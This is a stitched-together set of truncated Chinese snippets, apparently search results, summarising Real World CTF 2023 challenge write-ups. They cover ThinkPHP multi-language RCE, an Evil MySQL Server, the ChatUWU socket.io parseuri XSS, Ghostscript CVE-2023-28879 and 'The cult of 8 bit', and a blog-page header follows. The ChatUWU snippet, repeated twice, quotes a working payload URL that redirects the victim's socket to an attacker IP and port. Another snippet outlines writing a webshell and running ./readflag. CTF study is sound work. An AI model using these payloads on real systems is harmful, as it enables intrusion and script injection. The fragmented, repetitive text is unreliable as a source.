1. Be-a-Language-Expert 看题目就很容易能看得出来,这是考最近的 ThinkPHP 多语言 RCE 的漏洞: 直接先写入shell ,然后执行命令即可 执行 ./readflag /flag 即可 2.Evil MySQL Server 看名字就知道是考 MySQL 任意读取客
Real World CTF 是长亭科技主办的国际级CTF 大赛,采用CTF 夺旗赛和 Pwn 赛结合的全新赛制,赛题全部基于现实世界软件的修改或二次开发,是国内举办的以技术难度高、国际化参赛阵容强、接近真实世界体验感而著称的国际赛事。2018年举办首届即吸引5大洲,15 个国家地区近千支顶尖战队参赛,到第四届已有将近2000支上万人...
一个基于http://socket.io的聊天室,当时进去很混乱,也很纳闷一个公共的聊天室打XSS别人不会上车吗?但实际不是这样的,重点是这个http://socket.io的问题 (准确来说是http://socket.io中的parseuri问题)。 题目给了源码,前端index.html关键部分。 function reset() { location.href = `?nickname=guest${Str...
赛后参考 https://ctftime.org/writeup/36057 发现这题实际上是让前端的socket连接到我们自己的服务器上从而实现xss的。 这位是师傅的payload是这样的 http://47.254.28.30:58000/?room=DOMPurify&nickname=guest5279@85.244.211.240:9000 @ 后面是自己的服务器地址。 那这是什么原理呢? 详细分析 注意他前端连接...
使用不正确的编码,例如使用百分号编码的字符不符合 UTF-8 格式。 使用无效的端口号,例如端口号小于 0 或大于 65535。 例: // 使用非法字符如中间加入空格,%00等 let xhr = new XMLHttpRequest(); xhr.open("GET", "https://www.ex ample.com"); ...
本文深入解析了 Realworld CTF 2023 中的 ChatUWU 挑战。题目主要围绕一个基于 socket.io 的聊天室,其核心问题在于 socket.io 中的 parseuri 问题,而非 DOMPurify 的过滤漏洞。首先,题目提供了源码,其中前端的关键部分为 index.html。后端代码使用了 DOMPurify 来过滤传入的 from 和 text,但分析...
赛后参考 https://ctftime.org/writeup/36057 发现这题实际上是让前端的socket连接到我们自己的服务器上从而实现xss的。 这位是师傅的payload是这样的 http://47.254.28.30:58000/?room=DOMPurify&nickname=guest5279@85.244.211.240:9000 @ 后面是自己的服务器地址。 那这是什么原理呢? 详细分析 注意他前端连接so...
realworld ctf 体验赛上出了一道利用CVE-2023-28879的题目,借这个机会复现学习一下这个CVE 漏洞描述 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中,如果写入缓冲区的数据比总长度少一个字节,则尝试写入转义字符,导致两个字节被写入。攻...
RealWorldCtf2023-The_cult_of_8_bit详解 前言 很难的题,也是很有趣的题 这题要用到的一些知识点 同源策略 jsonp Same Orign Method Execution (同源方法执行) 浏览器的opener对象 iframe XHR 特征策略 提前要了解的一些东西 关于同源策略 同源策略具体可以参见文档...
Real World CTF 2023 XOR战队 IAL设计局 关注 专栏/Real World CTF 2023 XOR战队 Real World CTF 2023 XOR战队 2023年01月08日 21:24394浏览· 2点赞· 0评论 IAL设计局 粉丝:2017文章:17 关注本文禁止转载或摘编 分享到: 投诉或建议 评论0 最热 最新 请先登录后发表评论 (・ω・) 发布...